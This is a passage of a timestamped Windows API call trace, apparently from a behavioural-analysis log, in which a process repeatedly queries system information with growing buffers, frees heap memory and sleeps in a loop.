[0296.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0296.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.645] Sleep (dwMilliseconds=0x110) [0296.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0296.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0296.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0296.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0296.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0296.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0296.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0296.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0296.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.675] Sleep (dwMilliseconds=0x110) [0296.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0296.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0296.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0296.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0296.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0296.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0296.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0296.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0296.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.692] Sleep (dwMilliseconds=0x110) [0296.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0296.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0296.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0296.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0296.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0296.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0296.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0296.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0296.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.708] Sleep (dwMilliseconds=0x110) [0296.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0296.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0296.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0296.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0296.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0296.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0296.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0296.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0296.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.724] Sleep (dwMilliseconds=0x110) [0296.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0296.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0296.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0296.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0296.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0296.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0296.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0296.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0296.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.739] Sleep (dwMilliseconds=0x110) [0296.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0296.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0296.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0296.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0296.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0296.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0296.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0296.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0296.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.753] Sleep (dwMilliseconds=0x110) [0296.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0296.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0296.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0296.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0296.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0296.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0296.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0296.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0296.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.770] Sleep (dwMilliseconds=0x110) [0296.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0296.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0296.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0296.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0296.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0296.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0296.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0296.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0296.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.786] Sleep (dwMilliseconds=0x110) [0296.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0296.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0296.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0296.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0296.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0296.803] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.804] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0296.804] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0296.804] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.805] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0296.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.811] Sleep (dwMilliseconds=0x110) [0296.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0296.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0296.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0296.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0296.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0296.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0296.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0296.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0296.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.832] Sleep (dwMilliseconds=0x110) [0296.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0296.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0296.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0296.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0296.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0296.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0296.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0296.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0296.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.848] Sleep (dwMilliseconds=0x110) [0296.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0296.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0296.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0296.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0296.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0296.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0296.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0296.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0296.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.863] Sleep (dwMilliseconds=0x110) [0296.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0296.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0296.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0296.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0296.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0296.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0296.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0296.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0296.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.880] Sleep (dwMilliseconds=0x110) [0296.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0296.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0296.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0296.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0296.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0296.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, 